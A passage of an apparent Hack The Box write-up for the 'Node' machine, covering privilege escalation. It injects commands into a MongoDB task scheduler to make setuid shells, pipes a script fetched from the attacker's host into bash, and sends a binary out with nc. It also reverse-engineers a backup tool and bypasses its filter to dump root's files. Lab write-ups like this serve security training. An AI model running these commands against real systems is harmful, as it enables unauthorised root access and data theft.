+ > db.tasks.find()
+
+
+
+And here we basically copy the /bin/dash binary into the /tmp folder in order to have an executable shell owned by the user tom.
+
+
+ mark@node:~$ mongo -p -u mark scheduler
+ MongoDB shell version: 3.2.16
+ Enter password:
+ connecting to: scheduler
+ > db.tasks.insert( { "cmd" : "cp /bin/dash /tmp/nihilist; chmod 6755 /bin/dash;" })
+ WriteResult({ "nInserted" : 1 })
+ > db.tasks.find()
+ { "_id" : ObjectId("5e5fb1764ae843faaa36fbcc"), "cmd" : "cp /bin/dash /tmp/nihilist; chmod 6755 /bin/dash;" }
+ > db.tasks.find()
+ > exit
+ bye
+ mark@node:~$ ls -lash /tmp/nihilist
+ 152K -rwxr-xr-x 1 tom tom 151K Mar 4 13:48 /tmp/nihilist
+ mark@node:~$
+ mark@node:~$ ls -lash /tmp/nihilist
+ 152K -rwxr-xr-x 1 tom tom 151K Mar 4 13:48 /tmp/nihilist
+ mark@node:~$ /tmp/nihilist -p
+ $ id
+ uid=1001(mark) gid=1001(mark) groups=1001(mark)
+ $ exit
+ mark@node:~$ mongo -p -u mark scheduler
+ MongoDB shell version: 3.2.16
+ Enter password:
+ connecting to: scheduler
+ > db.tasks.insert( { "cmd" : "chmod u+s /tmp/nihilist" } )
+ WriteResult({ "nInserted" : 1 })
+ > db.tasks.find()
+ { "_id" : ObjectId("5e5fb336d83b43a3456459a9"), "cmd" : "chmod u+s /tmp/nihilist" }
+ > db.tasks.find()
+ { "_id" : ObjectId("5e5fb336d83b43a3456459a9"), "cmd" : "chmod u+s /tmp/nihilist" }
+ > db.tasks.find()
+ { "_id" : ObjectId("5e5fb336d83b43a3456459a9"), "cmd" : "chmod u+s /tmp/nihilist" }
+ > db.tasks.find()
+ { "_id" : ObjectId("5e5fb336d83b43a3456459a9"), "cmd" : "chmod u+s /tmp/nihilist" }
+ > db.tasks.find()
+ > exit
+ bye
+ mark@node:~$ /tmp/nihilist -p
+ $ id
+ uid=1001(mark) gid=1001(mark) euid=1000(tom) groups=1001(mark)
+ $ whoami
+ tom
+
+
+
+and here we can see that we have the binary named nihilist, owned by the user tom, therefore running it with the -p flag allows us to have tom's permissions. so let's print the user flag :
+
+
+ mark@node:~$ /tmp/nihilist -p
+ $ id
+ uid=1001(mark) gid=1001(mark) euid=1000(tom) groups=1001(mark)
+ $ cat /home/tom/user.txt
+ cat: /home/tom/user.txt: Permission denied
+ $ whoami
+ tom
+
+ $ cd /home/tom
+ $ mkdir .ssh
+ mkdir: cannot create directory ‘.ssh’: Permission denied
+
+ $ cd ..
+ $ ls -lash
+ total 20K
+ 4.0K drwxr-xr-x 5 root root 4.0K Aug 31 2017 .
+ 4.0K drwxr-xr-x 25 root root 4.0K Sep 2 2017 ..
+ 4.0K drwxr-xr-x 2 root root 4.0K Aug 31 2017 frank
+ 4.0K drwxr-xr-x 3 root root 4.0K Sep 3 2017 mark
+ 4.0K drwxr-xr-x 6 root root 4.0K Sep 3 2017 tom
+
+
+
+Now when we try to somehow edit something in any of the 3 user's directories we cannot , that's because they are owned by root, so let's move onto the root privesc :
+
+## **Part 3 : Getting Root Access**
+
+In order to privesc to the root user, we need to first enumerate the box using LinEnum.sh
+
+_Terminal 1:_
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → locate LinEnum.sh
+ /home/nihilist/_HTB/Cronos/LinEnum.sh
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → cp /home/nihilist/_HTB/Cronos/LinEnum.sh .
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → python -m SimpleHTTPServer 8081
+ Serving HTTP on 0.0.0.0 port 8081 ...
+
+
+` _Terminal 2:_
+
+
+ $ which curl
+ /usr/bin/curl
+ $ curl http://10.10.14.11:8081/LinEnum.sh | bash
+
+
+Not going to paste all the output of LinEnum.sh but we'll get to the interesting part:
+
+
+ $ find / -perm -4000 2>/dev/null
+ /usr/lib/eject/dmcrypt-get-device
+ /usr/lib/snapd/snap-confine
+ /usr/lib/dbus-1.0/dbus-daemon-launch-helper
+ /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
+ /usr/lib/openssh/ssh-keysign
+ /usr/lib/policykit-1/polkit-agent-helper-1
+ /usr/local/bin/backup
+ /usr/bin/chfn
+ /usr/bin/at
+ /usr/bin/gpasswd
+ /usr/bin/newgidmap
+ /usr/bin/chsh
+ /usr/bin/sudo
+ /usr/bin/pkexec
+ /usr/bin/newgrp
+ /usr/bin/passwd
+ /usr/bin/newuidmap
+ /tmp/nihilist
+ /bin/ping
+ /bin/umount
+ /bin/fusermount
+ /bin/ping6
+ /bin/ntfs-3g
+ /bin/su
+ /bin/mount
+
+ $ cd /var
+ $ ls
+ backups cache crash lib local lock log mail opt run scheduler snap spool tmp www
+ $ cd www/myplace
+ $ ls
+ app.html app.js node_modules package.json package-lock.json static
+ $ grep -Ri backup .
+ ./app.js:const backup_key = '45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474';
+ ./app.js: app.get('/api/admin/backup', function (req, res) {
+ ./app.js: var proc = spawn('/usr/local/bin/backup', ['-q', backup_key, __dirname ]);
+ ./app.js: var backup = '';
+ ./app.js: res.header("Content-Disposition", "attachment; filename=myplace.backup");
+ ./app.js: res.send(backup);
+ ./app.js: backup += chunk;
+ ./static/vendor/jquery/jquery.js: contextBackup = outermostContext,
+ ./static/vendor/jquery/jquery.js: dirrunsUnique = (dirruns += contextBackup == null ? 1 : Math.random() || 0.1),
+ ./static/vendor/jquery/jquery.js: outermostContext = contextBackup;
+ ./static/assets/js/app/controllers/admin.js: $scope.backup = function () {
+ ./static/assets/js/app/controllers/admin.js: $window.open('/api/admin/backup', '_self');
+ ./static/partials/admin.html: Download Backup
+
+
+
+So we do have a few binaries for us to use with the SetUID flags for us to use, most notably the /usr/local/bin/backup that once we grep -Ri we know how it works, but still we have other things to do. but we there is something else we can still do with the mongodb cmd exploit in order to change the permissions of our nihilist binary.
+
+
+ mark@node:~$ mongo -p -u mark scheduler
+ MongoDB shell version: 3.2.16
+ Enter password:
+ connecting to: scheduler
+ > db.tasks.insert( { "cmd" :"chown tom:admin /tmp/nihilist; chmod 6755 /tmp/nihilist;"})
+ WriteResult({ "nInserted" : 1 })
+ > db.tasks.find()
+ > exit
+ bye
+ mark@node:~$ ls -la /tmp/nihilist
+ -rwsr-sr-x 1 tom admin 154072 Mar 4 13:48 /tmp/nihilist
+
+
+And here we execute the nihilist binary to be part of the admin group.
+
+
+ mark@node:~$ /tmp/nihilist -p
+ $ id
+ uid=1001(mark) gid=1001(mark) euid=1000(tom) egid=1002(admin) groups=1002(admin),1001(mark)
+ $ cat /home/tom/user.txt
+ cat: /home/tom/user.txt: Permission denied
+
+
+However as you can see, this is not enough and we still need to escalate more privileges. now before our find command found the /usr/local/bin/backup binary so let's copy it locally on our machine to inspect it :
+
+_Terminal 1:_
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → nc -lvnp 8081 > backup
+ listening on [any] 8081 ...
+
+
+` _Terminal 2_
+
+
+ $ nc 10.10.14.11 8081 < /usr/local/bin/backup
+
+
+` _Terminal 1_
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → nc -lvnp 8081 > backup
+ listening on [any] 8081 ...
+ connect to [10.10.14.11] from (UNKNOWN) [10.10.10.58] 36276
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → file backup
+ backup: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=343cf2d93fb2905848a42007439494a2b4984369, not stripped
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → chmod +x backup
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → ./backup
+
+
+once given the permissions to execute backup, we get nothing, so let's examine it using radare2 :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → r2 backup
+ [0x08048780]> aaa
+ [x] Analyze all flags starting with sym. and entry0 (aa)
+ [x] Analyze function calls (aac)
+ [x] Analyze len bytes of instructions for references (aar)
+ [x] Check for objc references
+ [x] Check for vtables
+ [x] Type matching analysis for all functions (aaft)
+ [x] Propagate noreturn information
+ [x] Use -AA or aaaa to perform additional experimental analysis.
+ [0x08048780]> afl
+ [0x08048780]> vvv
+
+
+let's analyse the assembly (aaa) then print out the function list (afl) and then having visual representation (vvv) once we hit spacebar to have a good representating graph of what the binary does :
+
+
+
+from here, we see that the binary's main function checks for the number of arguements equal to 3 and if it returns false, it jumps to the block on the left to exit altogether. which is probably what we're seeing.
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → ./backup 1 2 3
+
+
+
+ ____________________________________________________
+ / \
+ | _____________________________________________ |
+ | | | |
+ | | | |
+ | | | |
+ | | | |
+ | | | |
+ | | | |
+ | | Secure Backup v1.0 | |
+ | | | |
+ | | | |
+ | | | |
+ | | | |
+ | | | |
+ | | | |
+ | |_____________________________________________| |
+ | |
+ \_____________________________________________________/
+ \_______________________________________/
+ _______________________________________________
+ _-' .-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-. --- `-_
+ _-'.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.--. .-.-.`-_
+ _-'.-.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-`__`. .-.-.-.`-_
+ _-'.-.-.-.-. .-----.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-----. .-.-.-.-.`-_
+ _-'.-.-.-.-.-. .---.-. .-----------------------------. .-.---. .---.-.-.-.`-_
+ :-----------------------------------------------------------------------------:
+ `---._.-----------------------------------------------------------------._.---'
+
+
+ [!] Could not open file
+
+
+
+So once we give it 3 arguements it finally prints out something, so let's run strace as we originally intended, but this time using 3 arguements :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → strace ./backup 1 2 3
+
+ [...]
+
+ openat(AT_FDCWD, "/etc/myplace/keys", O_RDONLY) = -1 ENOENT (No such file or directory)
+ write(1, " \33[33m[!]\33[37m Could not open fi"..., 36 [!] Could not open file
+
+ ) = 36
+ write(1, "\n", 1
+ ) = 1
+ exit_group(1) = ?
+ +++ exited with 1 +++
+
+
+
+And here we see that it's trying to read something in /etc/myplace/keys so let's check it on our box :
+
+
+ $ id
+ uid=1001(mark) gid=1001(mark) euid=1000(tom) egid=1002(admin) groups=1002(admin),1001(mark)
+ $ cd /etc/myplace
+ $ cat keys
+ a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508
+ **45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474**
+ 3de811f4ab2b7543eaf45df611c2dd2541a5fc5af601772638b81dce6852d110
+
+
+
+and we get 3 hashes ! and if you look closely, here we have one of the keys we found with our previous recursive grep -Ri command. so let's copy it locally and see what the binary tries to do once we have this /etc/myplace/keys file in place.
+
+
+ λ root [ 10.10.14.11/23 ] [nihilist/_HTB/Node]
+ → mkdir /etc/myplace
+
+ λ root [ 10.10.14.11/23 ] [nihilist/_HTB/Node]
+ → nano /etc/myplace/keys
+
+
+
+Now that it's in place, let's try to execute the backup with that one particular key we found again on the /root directory :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → ./backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 /root
+ [+] Finished! Encoded backup is below:
+
+ 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
+
+
+And we seem to get a base64 encoded string, let's copy it into a file, and decode it.
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → nano b64backup
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → cat b64backup
+ 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
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → cat b64backup | base64 -d > b64d_backup
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → file b64d_backup
+ b64d_backup: Zip archive data, at least v?[0x333] to extract
+
+
+And we have a zip archive, so let's try to unzip it :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → unzip b64d_backup
+ Archive: b64d_backup
+ skipping: root.txt need PK compat. v5.1 (can do v4.6)
+
+
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → 7z e b64d_backup
+
+ 7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
+ p7zip Version 16.02 (locale=en_GB.UTF-8,Utf16=on,HugeFiles=on,64 bits,4 CPUs Intel(R) Pentium(R) Silver N5000 CPU @ 1.10GHz (706A1),ASM,AES-NI)
+
+ Scanning the drive for archives:
+ 1 file, 1141 bytes (2 KiB)
+
+ Extracting archive: b64d_backup
+ --
+ Path = b64d_backup
+ Type = zip
+ Physical Size = 1141
+
+
+ Enter password (will not be echoed):
+ Everything is Ok
+
+ Size: 2584
+ Compressed: 1141
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → ls
+ b64backup b64d_backup backup nihilist.sh LinEnum.sh myplace myplace.backup root.txt var
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → cat root.txt
+ QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
+ QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
+ QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
+ QQQQQQQQQQQQQQQQQQQWQQQQQWWWBBBHHHHHHHHHBWWWQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
+ QQQQQQQQQQQQQQQD!`__ssaaaaaaaaaass_ass_s____. -~""??9VWQQQQQQQQQQQQQQQQQQQ
+ QQQQQQQQQQQQQP'_wmQQQWWBWV?GwwwmmWQmwwwwwgmZUVVHAqwaaaac,"?9$QQQQQQQQQQQQQQ
+ QQQQQQQQQQQW! aQWQQQQW?qw#TTSgwawwggywawwpY?T?TYTYTXmwwgZ$ma/-?4QQQQQQQQQQQ
+ QQQQQQQQQQW' jQQQQWTqwDYauT9mmwwawww?WWWWQQQQQ@TT?TVTT9HQQQQQQw,-4QQQQQQQQQ
+ QQQQQQQQQQ[ jQQQQQyWVw2$wWWQQQWWQWWWW7WQQQQQQQQPWWQQQWQQw7WQQQWWc)WWQQQQQQQ
+ QQQQQQQQQf jQQQQQWWmWmmQWU???????9WWQmWQQQQQQQWjWQQQQQQQWQmQQQQWL 4QQQQQQQQ
+ QQQQQQQP'.yQQQQQQQQQQQP" <****wa,.!4WQQQQQQQWdWP??!"??4WWQQQWQQc ?QWQQQQQ
+ QQQQQP'_a. <****aamQQQW! <****yF "!` .. "??$Qa "WQQQWTVP' "??' =QQmWWV?46/ ?QQQQQ
+ QQQP'sdyWQP?!`.-"?46mQQQQQQT!mQQgaa. <****wWQQWQaa _aawmWWQQQQQQQQQWP4a7g -WWQQ
+ QQ[ j@mQP'adQQP4ga, -????" <****jQQQQQWQQQQQQQQQWW;)WQWWWW9QQP?"` -?QzQ7L ]QQQ
+ QW jQkQ@ jWQQD'-?$QQQQQQQQQQQQQQQQQWWQWQQQWQQQc "4QQQQa .QP4QQQQfWkl jQQQ
+ QE ]QkQk $D?` waa "?9WWQQQP??T?47`_aamQQQQQQWWQw,-?QWWQQQQQ`"QQQD\Qf(.QWQQ
+ QQ,-Qm4Q/-QmQ6 "WWQma/ "??QQQQQQL 4W"- -?$QQQQWP`s,awT$QQQ@ "QW@?$:.yQQQQ
+ QQm/-4wTQgQWQQ, ?4WWk 4waac -???$waQQQQQQQQF??' <****mWWWWWQW?^ ` ]6QQ' yQQQQQ
+ QQQQw,-?QmWQQQQw a, ?QWWQQQw _. "????9VWaamQWV???" a j/ ]QQf jQQQQQQ
+ QQQQQQw,"4QQQQQQm,-$Qa ???4F jQQQQQwc <****aaas _aaaaa 4QW ]E )WQ`=QQQQQQQ
+ QQQQQQWQ/ $QQQQQQQa ?H ]Wwa, ???9WWWh dQWWW,=QWWU? ?! )WQ ]QQQQQQQ
+ QQQQQQQQQc-QWQQQQQW6, QWQWQQQk <****c jWQ ]QQQQQQQ
+ QQQQQQQQQQ,"$WQQWQQQQg,."?QQQQ'.mQQQmaa,., . .; QWQ.]QQQQQQQ
+ QQQQQQQQQWQa ?$WQQWQQQQQa,."?( mQQQQQQW[:QQQQm[ ammF jy! j( } jQQQ(:QQQQQQQ
+ QQQQQQQQQQWWma "9gw?9gdB?QQwa, -??T$WQQ;:QQQWQ ]WWD _Qf +?! _jQQQWf QQQQQQQ
+ QQQQQQQQQQQQQQQws "Tqau?9maZ?WQmaas,, --~-- --- . _ssawmQQQQQQk 3QQQQWQ
+ QQQQQQQQQQQQQQQQWQga,-?9mwad?1wdT9WQQQQQWVVTTYY?YTVWQQQQWWD5mQQPQQQ ]QQQQQQ
+ QQQQQQQWQQQQQQQQQQQWQQwa,-??$QwadV} <****wBHHVHWWBHHUWWBVTTTV5awBQQD6QQQ ]QQQQQQ
+ QQQQQQQQQQQQQQQQQQQQQQWWQQga,-"9$WQQmmwwmBUUHTTVWBWQQQQWVT?96aQWQQQ ]QQQQQQ
+ QQQQQQQQQQWQQQQWQQQQQQQQQQQWQQma,-?9$QQWWQQQQQQQWmQmmmmmQWQQQQWQQW(.yQQQQQW
+ QQQQQQQQQQQQQWQQQQQQWQQQQQQQQQQQQQga%,. -??9$QQQQQQQQQQQWQQWQQV? sWQQQQQQQ
+ QQQQQQQQQWQQQQQQQQQQQQQQWQQQQQQQQQQQWQQQQmywaa,;~^"!???????!^`_saQWWQQQQQQQ
+ QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQWWWWQQQQQmwywwwwwwmQQWQQQQQQQQQQQ
+ QQQQQQQWQQQWQQQQQQWQQQWQQQQQWQQQQQQQQQQQQQQQQWQQQQQWQQQWWWQQQQQQQQQQQQQQQWQ
+
+successfully unzipping it, we get a troll root.txt so upon further inspection of the backup binary file using radare2 we see that we need to supply other arguements
+
+
+
+in this function we see that we have a sanitiszation happening at the beginning of the function, and if it's 2 periods, it is going to push that b64 trollface string.
+
+
+
+in this function we see that we are also unable to give it the /root parameter
+
+and looking at the other functions we see that we are unable to use .. /root : & ` $ | /etc // / as parameters given to that backup binary
+
+But as you can see we don't have just root, we have /root so we can simply go to the / directory, and execute the binary from there, we don't have to give it the / before passing the root parameter.
+
+
+ $ /usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 home/tom/user.txt
+ UEsDBAoACQAAAJd9I0se46vsLQAAACEAAAARABwAaG9tZS90b20vdXNlci50eHRVVAkAA14VrFkYyF9edXgLAAEEAAAAAAToAwAAYg9ogU9H2FDWDWqaDu0w9XL3V2d03Xaa+Yqp/4M9tOD/HInQtG22oqn5GlP2UEsHCB7jq+wtAAAAIQAAAFBLAQIeAwoACQAAAJd9I0se46vsLQAAACEAAAARABgAAAAAAAEAAACggQAAAABob21lL3RvbS91c2VyLnR4dFVUBQADXhWsWXV4CwABBAAAAAAE6AMAAFBLBQYAAAAAAQABAFcAAACIAAAAAAA=
+
+ $ /usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 root
+
+ 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
+
+
+Because we are ALREADY at / we don't need to say /root which is a bad character. so let's copy this locally :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → nano user.zip.b64
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Node]
+ → cat user.zip.b64| base64 -d > user.zip
+
